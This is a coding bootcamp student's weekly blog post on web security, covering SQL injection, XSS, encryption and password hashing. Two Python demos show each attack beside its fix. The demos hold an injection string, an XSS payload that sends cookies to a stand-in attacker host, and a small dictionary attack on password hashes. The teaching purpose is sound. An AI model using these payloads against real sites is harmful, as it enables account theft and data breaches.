It’s Sunday following the 12th week of Tech Elevator’s 14-week coding Bootcamp.
This week Tech Elevator hosted the second and final “Employer Matchmaking” event, and I’ve been putting a lot of time into my passion project. This was the final week of lectures, which focused on web security. Next week we start our two-week Capstone project which will put all of our programming skills to work.
We started our module on web security learning about some of the most common security risks and how to defend against them; namely SQL injection and cross-site scripting (XSS) attacks. In a SQL injection attack, the attacker reaches an application’s database by sending SQL, the database query language, inside an ordinary web request. If the server builds its query by gluing the submitted text into a SQL string, that text is executed as part of the query. For example, if an attacker wants all customer data from an online store, they can pose as a customer and type a SQL fragment into one of the store’s search or login forms in hopes of retrieving more data than the store intended. The defense is to never build queries out of user text; use parameterized queries (prepared statements), so the database treats the input as a value rather than as SQL. Cross-site scripting happens when an attacker gets a site to include their own front-end script, usually JavaScript, in a page served to other users. Because that script runs in the victim’s browser with the site’s privileges, it can read cookies, form data and other personal information. The defense is to escape user-supplied text for the context it is rendered in (HTML body, attribute, URL) so the browser displays it as text instead of running it.
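Here is an added example, not code from the original post or from Tech Elevator’s course material, showing both attacks side by side with their fixes. It uses Python’s built-in sqlite3 module and an in-memory database; the table name, the customer rows and the two attack strings are constructed for the demo.

```python
import html
import sqlite3


def build_store():
    """Constructed sample data: an in-memory store with three customers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"),
         ("bob", "bob@example.com"),
         ("carol", "carol@example.com")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Builds the SQL by string concatenation: whatever the form sends becomes SQL."""
    query = "SELECT name, email FROM customers WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, name):
    """Parameterized query: the driver sends the value separately from the SQL text,
    so the database never parses the user's input as SQL."""
    return conn.execute(
        "SELECT name, email FROM customers WHERE name = ?", (name,)
    ).fetchall()


# Classic injection string: closes the quoted literal and appends an always-true clause.
SQLI_PAYLOAD = "x' OR '1'='1"


def render_greeting_vulnerable(name):
    """Reflects the user's text straight into the page: stored or reflected XSS."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    """html.escape turns <, >, &, and quotes into entities, so the browser shows
    the payload as text instead of executing it."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


# Constructed XSS payload that would ship the victim's cookies to a third party.
XSS_PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = build_store()
    print("vulnerable, honest input:", lookup_vulnerable(conn, "alice"))
    print("vulnerable, injected   :", lookup_vulnerable(conn, SQLI_PAYLOAD))  # all rows
    print("parameterized, injected:", lookup_safe(conn, SQLI_PAYLOAD))        # no rows
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_safe(XSS_PAYLOAD))
```

The vulnerable lookup with the injected name returns every customer, because the WHERE clause became `name = 'x' OR '1'='1'`; the parameterized version looks for a customer literally named `x' OR '1'='1` and finds none. Note that escaping is context-specific: html.escape is right for text inside an HTML element or attribute, but text placed into a URL or a script block needs a different encoder.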
SQL injection and cross-site scripting lead us to a fundamental part of web security: encryption. Most people have heard the term, but not everybody knows what it means. Encryption is the process of scrambling information so that it is unreadable to anyone who doesn’t hold the matching key, before it is sent between two parties. For example, a good website serves every page over HTTPS, so your password is encrypted by the TLS connection before it leaves your browser and can’t be read by anyone watching the network in between.
Three related tools came up: symmetric encryption, asymmetric encryption and hashing (the third, strictly speaking, isn’t encryption; more on that below). We differentiate between them by how they use keys. A key is a long secret string that the algorithm uses to encrypt and decrypt data. Symmetric encryption uses the same key on both sides. It is fast and, with a modern algorithm such as AES, very strong; its weakness is not the algorithm but key distribution. The client and the server must already share the secret, and if an attacker obtains that one key from either side they can read everything. Asymmetric encryption solves the distribution problem with a key pair. The server publishes a public key that anyone can use to scramble data, and keeps a private key that is the only thing able to unscramble it, so the client needs no pre-shared secret. What a public key alone does not give you is authenticity: since anyone can encrypt to it, the server can’t tell who sent a message, and the client can’t tell whether the public key it downloaded really belongs to the server or to an attacker sitting in the middle. That is why asymmetric systems are paired with digital signatures and certificates (which is what HTTPS does) to prove who owns which key.
The crown jewel of this module was hashing. Technically hashing isn’t encryption because it is one-way: there is no key and no decrypt step. A hash is a fixed-size string produced by a hashing algorithm. The two main properties are (1) the same input always produces the same hash, and (2) it is computationally infeasible to recover the original input from the hash. With hashing, servers don’t store actual passwords, only the hash produced from each password. When a user logs in, the server hashes what they typed and compares it to the stored hash; since the same password produces the same hash every time, a match authenticates the user. If a hacker steals the database, they get hashes instead of passwords. That doesn’t make the data useless, though: an attacker can’t reverse a good hash, but they can guess candidate passwords, hash each guess, and compare. The industry term for this is “brute forcing” (or a dictionary attack when the guesses come from a list of common passwords). So the key to password hashing is to use a purpose-built, deliberately slow algorithm such as bcrypt, scrypt, Argon2 or PBKDF2, and to add a random salt to each password so that identical passwords get different hashes and precomputed tables are useless. A plain, fast hash like MD5 or SHA-256 with no salt lets an attacker test billions of guesses per second on commodity GPUs.
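As an added example (not the post’s own code or Tech Elevator’s), the following uses only Python’s standard library to store and verify a password with a salted, slow hash, and then runs a small dictionary attack against both an unsalted SHA-256 hash and the salted one. The guess list, the sample passwords and the PBKDF2 iteration count are constructed for the demo; the count is kept low so it runs quickly and should be raised in production.

```python
import hashlib
import hmac
import os

# Iteration count chosen low for the demo; production deployments use far more.
ITERATIONS = 100_000
SALT_BYTES = 16


def hash_password(password, salt=None):
    """Return (salt, digest). Same password + same salt always gives the same digest;
    a fresh random salt makes two users with the same password store different digests."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, stored_digest):
    """Re-hash the login attempt with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)


def weak_hash(password):
    """What NOT to store: one fast, unsalted SHA-256 over the password."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Constructed "common passwords" list standing in for a real wordlist.
GUESSES = ["123456", "password", "qwerty", "letmein", "password123"]


def brute_force_weak(target_hex, guesses=GUESSES):
    """Dictionary attack on an unsalted fast hash: one cheap hash per guess, and the
    same table of guess->hash works against every user in the database."""
    for guess in guesses:
        if weak_hash(guess) == target_hex:
            return guess
    return None


def brute_force_salted(salt, target_digest, guesses=GUESSES):
    """Same attack against the salted slow hash: each guess now costs ITERATIONS
    rounds and must be recomputed per user, but a weak password is still found."""
    for guess in guesses:
        if verify_password(guess, salt, target_digest):
            return guess
    return None


if __name__ == "__main__":
    # A strong passphrase and a weak password, both stored the right way.
    salt_strong, digest_strong = hash_password("correct horse battery staple")
    salt_weak, digest_weak = hash_password("password123")
    print("login ok        :", verify_password("correct horse battery staple", salt_strong, digest_strong))
    print("wrong password  :", verify_password("Tr0ub4dor&3", salt_strong, digest_strong))
    print("crack unsalted  :", brute_force_weak(weak_hash("password123")))
    print("crack salted    :", brute_force_salted(salt_weak, digest_weak))
    print("crack strong    :", brute_force_salted(salt_strong, digest_strong))
```

The last three lines make the practical point: the unsalted hash of a common password falls immediately; the salted, slow hash of the same weak password still falls, just more slowly and only after work done for that one user; and the passphrase outside the wordlist survives. Hashing protects users with good passwords and raises the attacker’s cost for everyone else, but it does not rescue a password that is on the guess list.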
As I mentioned earlier, I’ve been working hard on my passion project. If you’re not familiar with the project, read about it in Week 9. I’ve decided to transition the project from a U.S. state-specific tool to a national one. The web site will be called WriteMyRepresentative.com and will be focused on the feature that writes a letter to your congressman based on your answers to survey questions. More details to come.
Thanks for reading! As always, contact me at joeosterfeld@gmail.com with questions.